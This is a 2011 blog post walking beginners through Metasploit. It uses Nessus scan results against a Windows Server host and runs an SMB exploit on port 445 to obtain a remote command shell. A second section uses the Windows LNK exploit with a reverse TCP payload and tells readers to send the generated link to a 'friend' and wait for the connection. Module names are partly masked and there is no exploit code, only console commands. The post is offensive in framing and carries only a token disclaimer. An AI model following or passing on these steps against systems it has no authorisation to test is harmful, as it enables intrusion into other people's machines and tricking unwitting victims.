Saturday, October 15, 2011

Metasploit Basic exploiting for new Starters




SCANNED WITH NESSUS :
IP : 192.168.*.*


Number of vulnerabilities
Open ports :
29
High :
300
Medium :
47
Low :
77


Remote host information
Operating System :
Microsoft Windows  Server (English)

Synopsis:
The remote host seems to be a VMware virtual machine.

Description:
According to the MAC address of its network adapter, the remote host is a VMware virtual machine.

LIST OF OPEN PORTS:



TESTING WITH FRAMEWORK:
Ex:
Goto metasploit framework
I’ve chosen 445 port since it has got high number of vulnerabilities.


Now we choose the vulnerability with id :19408 .
Now we got to framework and search for the exploit corresponding to the above vulnerability.

 

We choose the above exploit:
Ex:


Now type >show options to see the target host is set or not.

 

As you can see there is no target  set ,so now we set the target below:





The target should to 0 as it is given it works against windows 2***. :


---------------------------------------------
Now we select the payloads :
To see the payloads type :
>show payloads.
To set the payload see below:

To see if our local ip or host is set or not  type:
>show options
U will see this :



As u can observe that LHOST is not set that is our local ip :
To set it . type :

>set LHOST <host ip>

Now type
>exploit


Hurrayy…!
U will be getting the target host command shell.
Njoy.!

========================================================================


Windows lnk Exploit

Hack the system using the windows lnk exploit:

Update metasploit.
Goto the prompt and goto framework

Then type:

#./msfconsole

Msf>prompt opens..

The search for the exploit windows lnk.

Msf>search lnk

Then it shows the exploit

exploit/xxxxx/xxxxxr/xxxxx_dllloader

then type:
msf>use exploitname(type above exploit)

set SRVHOST  tat is your local ip to get conection back
.
Then set payload

Shell/reverse_tcp payload works mostly

so type:

msf>set payload windows/metxxxxx/xxx_tcp
then set LHOST as your local ip

then type:

msf>exploit

you will be shown a url or address with port number..give it to ur friend
tada !
wait for the reverse connection.
---------------------------------------------------
Warning: Im not responsible for ur actions , just for educational purpose only

0 comments:

Post a Comment

Twitter Delicious Facebook Digg Stumbleupon Favorites More